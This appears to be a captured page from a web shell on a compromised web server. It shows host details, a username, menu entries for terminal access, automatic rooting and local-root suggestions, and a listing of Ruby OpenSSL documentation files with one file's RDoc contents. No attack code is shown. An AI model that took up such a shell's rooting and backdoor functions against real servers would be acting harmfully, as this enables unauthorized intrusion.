Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby31 /
share /
ri /
system /
OpenSSL /
Config /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d-i.ri
835
B
-rw-r--r--
2025-04-28 21:06
cdesc-Config.ri
1.22
KB
-rw-r--r--
2025-04-28 21:06
each-i.ri
528
B
-rw-r--r--
2025-04-28 21:06
get_value-i.ri
884
B
-rw-r--r--
2025-04-28 21:06
initialize_copy-i.ri
268
B
-rw-r--r--
2025-04-28 21:06
inspect-i.ri
420
B
-rw-r--r--
2025-04-28 21:06
new-c.ri
751
B
-rw-r--r--
2025-04-28 21:06
parse-c.ri
407
B
-rw-r--r--
2025-04-28 21:06
parse_config-c.ri
431
B
-rw-r--r--
2025-04-28 21:06
sections-i.ri
390
B
-rw-r--r--
2025-04-28 21:06
to_s-i.ri
1.12
KB
-rw-r--r--
2025-04-28 21:06
Save
Rename
U:RDoc::AnyMethod[iI" to_s:ETI"OpenSSL::Config#to_s;TF:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"9Gets the parsable form of the current configuration.;To:RDoc::Markup::BlankLine o; ; [I"5Given the following configuration being created:;T@o:RDoc::Markup::Verbatim; [ I""config = OpenSSL::Config.new ;TI"* #=> #<OpenSSL::Config sections=[]> ;TI"5config['default'] = {"foo"=>"bar","baz"=>"buz"} ;TI"( #=> {"foo"=>"bar", "baz"=>"buz"} ;TI"puts config.to_s ;TI" #=> [ default ] ;TI" # foo=bar ;TI" # baz=buz ;T:@format0o; ; [I"OYou can parse get the serialized configuration using #to_s and then parse ;TI"it later:;T@o;; [ I"%serialized_config = config.to_s ;TI"# much later... ;TI";new_config = OpenSSL::Config.parse(serialized_config) ;TI"3 #=> #<OpenSSL::Config sections=["default"]> ;TI"puts new_config ;TI" #=> [ default ] ;TI" foo=bar ;TI" baz=buz;T; 0: @fileI"ext/openssl/ossl_config.c;T:0@omit_headings_from_table_of_contents_below0I"config.to_s -> string ;T0[ I"();T@*FI"Config;TcRDoc::NormalClass00